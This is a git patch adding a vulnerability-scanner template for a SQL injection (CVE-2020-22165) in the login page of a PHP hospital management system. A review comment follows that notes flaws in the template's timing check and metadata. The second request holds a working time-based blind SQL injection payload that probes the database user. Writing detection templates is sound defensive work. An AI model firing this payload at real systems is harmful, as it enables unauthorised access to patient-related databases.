From 2fb20ee36aac9947d948d7bed951ed3eebd0b3a5 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 9 Oct 2025 15:32:38 +0530
Subject: [PATCH] Create CVE-2020-22165.yaml

---
 http/cves/2020/CVE-2020-22165.yaml | 62 ++++++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 http/cves/2020/CVE-2020-22165.yaml

diff --git a/http/cves/2020/CVE-2020-22165.yaml b/http/cves/2020/CVE-2020-22165.yaml
new file mode 100644
index 00000000000..d3b6167a36e
--- /dev/null
+++ b/http/cves/2020/CVE-2020-22165.yaml
@@ -0,0 +1,62 @@
+id: CVE-2020-22165
+
+info:
+  name: PHPGurukul Hospital Management System 4.0 - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\user-login.php. Remote unauthenticated users can exploit the vulnerability to obtain sensitive database information.
+  impact: |
+    Successful exploitation allows attackers to access sensitive data from the database, potentially leading to data leakage and further compromise of the application.
+  remediation: |
+    Upgrade to the latest version or apply proper input sanitization and parameterized queries to mitigate this vulnerability.
+  reference:
+    - https://github.com/itodaro/PHPGurukul_Hospital_Management_System4.0_cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22165
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-22165
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: phpgurukul
+    product: hospital_management_system
+    fofa-query: title="Hospital Management System" && body="HMS"
+  tags: cve2020,cve,hms,cms,sqli,phpgurukul
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        @timeout: 30s
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "Hospital Management")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=a' and 1=2 union select 1,2,if(substring((select user() limit 0,1),1,1)='r',sleep(8),1),4,5,6,7,8,9#&password=asfsafafsafsaf&submit=1&submit=
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=8'
+          - 'status_code == 200'
+        condition: and
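Review bot: The second request's matcher (`duration>=8` and `status_code == 200`) has no baseline to compare against, so any target that simply takes 8 s or longer to answer the login POST is reported as vulnerable, and conversely the delay in the payload is conditional on the injected predicate, so a vulnerable install where that predicate is false yields no match; both the false-positive and false-negative limits of this time-based check are worth stating in the `description` or a comment. `max-request: 3` in `metadata` does not agree with the two requests under `http:` (`flow: http(1) && http(2)`); it should read `max-request: 2`. The description names the endpoint as `\hms\user-login.php` with backslashes while the requests use `/hms/user-login.php`; use the forward-slash form consistently. `stop-at-first-match: true` on a request with a single payload has no effect and can be dropped.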